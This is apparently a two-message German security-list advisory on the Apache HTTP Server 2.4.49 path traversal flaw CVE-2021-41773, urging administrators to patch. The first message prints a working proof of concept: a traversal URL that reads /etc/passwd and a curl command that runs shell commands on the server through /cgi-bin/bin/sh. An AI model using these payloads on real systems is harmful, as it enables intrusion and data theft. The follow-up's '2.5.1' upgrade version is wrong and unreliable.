Hallo zusammen,
sofern nicht selber schon gesehen/-lesen hier [0] FYI (siehe dazu au [1])
"Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)"
--> Update von Version 2.4.49 auf 2.4.50
--> "require all denied" aktivieren (per difault disabled)
--> PoC: ${SERVER}/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd curl --data "A=|id>>/tmp/x;uname$IFS-a>>/tmp/x" 'http://%24%7BSERVER%7D:%24%7BPORT%7D/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
--> ein passendes nmap Script gibt es unter [2] (man kann passwd auch durch hosts ersetzen ;) )
VG
Bernd
[0] https://httpd.apache.org/security/vulnerabilities_24.html
[2] https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve-...
Hallo zusamen,
das Problem ist nicht final gefixt, daher gibt es nun die Apapche Version [0] 2.5.1
Dieses Update bitte zeitnah einspielen.
VG
Bernd
[0] https://httpd.apache.org/download.cgi#apache24
rwth-security@lists.rwth-aachen.de